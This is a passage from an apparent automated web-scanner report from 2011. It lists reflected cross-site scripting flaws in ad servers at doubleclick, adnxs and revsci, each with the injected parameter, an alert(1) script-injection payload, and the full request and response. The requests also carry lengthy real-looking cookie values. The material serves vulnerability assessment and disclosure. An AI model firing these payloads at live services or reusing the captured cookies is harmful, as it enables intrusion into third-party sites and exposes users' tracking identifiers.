Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 807
Date: Thu, 16 Jun 2011 15:52:27 GMT

<iframe width="728px" height="90px" marginHeight="0" src="http://dar.youknowbest.com/?afid=1304&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/17/ba/%2a/e%3B242318863%3B0-0%3B0%3B65145569%3B34
...[SNIP]...
etwork.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?&AD_CALL_ID=1199171978?81684"><script>alert(1)</script>19274c0fab6&AD_ID=&BEHAVIOR_SIGNAL_ID=&CHANNEL_ID=&LINE_ITEM_ID=&PUBLISHER_ID=&SITE_ID=&DFA_BuyId=5598690&DFA_PlacementId=65145569&DFA_AdId=242318863&DFA_CreativeId=42541965&DFA_SiteId=769318" frameBorder="0" all
...[SNIP]...

3.13. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.RealMedia/B5598690.8

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92268"><script>alert(1)</script>7b006743805 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=473239540?&92268"><script>alert(1)</script>7b006743805=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 812
Date: Thu, 16 Jun 2011 16:03:08 GMT

<iframe width="728px" height="90px" marginHeight="0" src="http://dar.youknowbest.com/?afid=1304&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/17/bd/%2a/h%3B242318863%3B0-0%3B0%3B65145576%3B34
...[SNIP]...
ork.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?&AD_CALL_ID=473239540?&92268"><script>alert(1)</script>7b006743805=1&AD_ID=&BEHAVIOR_SIGNAL_ID=&CHANNEL_ID=&LINE_ITEM_ID=&PUBLISHER_ID=&SITE_ID=&DFA_BuyId=5598690&DFA_PlacementId=65145576&DFA_AdId=242318863&DFA_CreativeId=42541965&DFA_SiteId=769318" frameBorder="0" a
...[SNIP]...

3.14. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.RealMedia/B5598690.8

Issue detail

The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3787b"><script>alert(1)</script>74e57ab2c7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=473239540?3787b"><script>alert(1)</script>74e57ab2c7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 808
Date: Thu, 16 Jun 2011 16:02:49 GMT

<iframe width="728px" height="90px" marginHeight="0" src="http://dar.youknowbest.com/?afid=1304&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/17/bd/%2a/h%3B242318863%3B0-0%3B0%3B65145576%3B34
...[SNIP]...
work.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?&AD_CALL_ID=473239540?3787b"><script>alert(1)</script>74e57ab2c7&AD_ID=&BEHAVIOR_SIGNAL_ID=&CHANNEL_ID=&LINE_ITEM_ID=&PUBLISHER_ID=&SITE_ID=&DFA_BuyId=5598690&DFA_PlacementId=65145576&DFA_AdId=242318863&DFA_CreativeId=42541965&DFA_SiteId=769318" frameBorder="0" all
...[SNIP]...

3.15. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bd55'%3balert(1)//95903aa050d was submitted in the site parameter. This input was echoed as 5bd55';alert(1)//95903aa050d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/nbcu.cnbc/home_homeus;site=5bd55'%3balert(1)//95903aa050d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 298
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:26:16 GMT
Expires: Thu, 16 Jun 2011 11:26:16 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/0/0/%2a/b;44306;0-0;0;62912129;6202-272/94;0/0/0;;~okv=;site=5bd55';alert(1)//95903aa050d;bsg=101691;;~aopt=2/1/b7/1;~sscs=%3f">
...[SNIP]...

3.16. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/news_us

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4a9f'%3balert(1)//b72ec743f5c was submitted in the site parameter. This input was echoed as d4a9f';alert(1)//b72ec743f5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/nbcu.cnbc/news_us;site=d4a9f'%3balert(1)//b72ec743f5c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 298
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:26:26 GMT
Expires: Thu, 16 Jun 2011 11:26:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/0/0/%2a/j;44306;0-0;0;59662821;6202-272/94;0/0/0;;~okv=;site=d4a9f';alert(1)//b72ec743f5c;bsg=101691;;~aopt=2/1/b7/1;~sscs=%3f">
...[SNIP]...

3.17. http://ad.doubleclick.net/adj/nbcu.cnbc/search [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/search

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4ab7'%3balert(1)//7bf8f2b598b was submitted in the site parameter. This input was echoed as b4ab7';alert(1)//7bf8f2b598b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/nbcu.cnbc/search;site=b4ab7'%3balert(1)//7bf8f2b598b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 320
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:28:26 GMT
Expires: Thu, 16 Jun 2011 11:28:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/0/0/%2a/l;44306;0-0;0;15678123;6202-272/94;0/0/0;;~okv=;site=b4ab7';alert(1)//7bf8f2b598b;bsg=101037;bsg=101691;bsg=106221;;~aopt=2/1/b7/1;~sscs=%3f">
...[SNIP]...

3.18. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40cef'-alert(1)-'ebde4383a16 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=19340cef'-alert(1)-'ebde4383a16&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI_3YQChgBIAEoATDOzeXvBBDOzeXvBBgA; anj=Kfw)k=m<8a)J710KuqQv<wO[?.Z_6mQq(g8AdPznm4mV81(GwAdiq`tRFu9!<9WzID'dGuNsFx#:D$8):ECJr9*<7Y2B>h7#K-)26=S$JLUK>tc`oa^hD)BGY/HDIhRDv9`a)c=8Ns>'sTtY@rKf[42mEhF[x1(Z_WwCH=Q+CR#M/Pcv%qJCor_')4ZdnJAHJC!a[2QmvVUX0Y_AKQ6]5HO+=VJZ`Cn[.2-IAX7bw@(a6>NjWme_:Ez/L:lx+(-pIN(s?u*Kp^>>(5'p4ofX#f0tYcv/p_jyip?!*]Dhn<#nKj>zFXcZ3]cqTB$x8^Vcd3Q-9>LakKGuGRw!Wji-MU9XpC`s@ic92+2>.GL=U`b%(%gUKPx$]'`FGhEuD(sI?!QUr=v^-Mw`]j'Z.GUWgN$LX9J+!8fE#32>o8R`ORKPT@'^f3FPpl/vc(/uBHutpQhMdK68AZiL))1=C1hP-UYc7$L8HQ4R_fODEItt9)Se99+Gb46bp3t#1x-akYef0CGm/MocK_-@Tp5y1_eYlocCWH/?W=eW+d^NMAs)%MKv$X4.^owlwj<.lUF)12uChi8B:r08nN+5]N0mcIu/@qO$hlOz@IaFRGpZ*%hA-[It2owGgYBR3JoC5rww'EPwpN%zx; sess=1; uuid2=3420415245200633085

Response

3.19. http://admeld.adnxs.com/usersync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df9fd'-alert(1)-'d546aeb28c4 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchdf9fd'-alert(1)-'d546aeb28c4 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI_3YQChgBIAEoATDOzeXvBBDOzeXvBBgA; anj=Kfw)k=m<8a)J710KuqQv<wO[?.Z_6mQq(g8AdPznm4mV81(GwAdiq`tRFu9!<9WzID'dGuNsFx#:D$8):ECJr9*<7Y2B>h7#K-)26=S$JLUK>tc`oa^hD)BGY/HDIhRDv9`a)c=8Ns>'sTtY@rKf[42mEhF[x1(Z_WwCH=Q+CR#M/Pcv%qJCor_')4ZdnJAHJC!a[2QmvVUX0Y_AKQ6]5HO+=VJZ`Cn[.2-IAX7bw@(a6>NjWme_:Ez/L:lx+(-pIN(s?u*Kp^>>(5'p4ofX#f0tYcv/p_jyip?!*]Dhn<#nKj>zFXcZ3]cqTB$x8^Vcd3Q-9>LakKGuGRw!Wji-MU9XpC`s@ic92+2>.GL=U`b%(%gUKPx$]'`FGhEuD(sI?!QUr=v^-Mw`]j'Z.GUWgN$LX9J+!8fE#32>o8R`ORKPT@'^f3FPpl/vc(/uBHutpQhMdK68AZiL))1=C1hP-UYc7$L8HQ4R_fODEItt9)Se99+Gb46bp3t#1x-akYef0CGm/MocK_-@Tp5y1_eYlocCWH/?W=eW+d^NMAs)%MKv$X4.^owlwj<.lUF)12uChi8B:r08nN+5]N0mcIu/@qO$hlOz@IaFRGpZ*%hA-[It2owGgYBR3JoC5rww'EPwpN%zx; sess=1; uuid2=3420415245200633085

Response

3.20. http://adnxs.revsci.net/imp [Z parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adnxs.revsci.net
Path:	/imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0354'-alert(1)-'258bf903830 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp?Z=300x250c0354'-alert(1)-'258bf903830&s=1457934&r=0&_salt=1248176818&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308241078986%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308241078986&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; 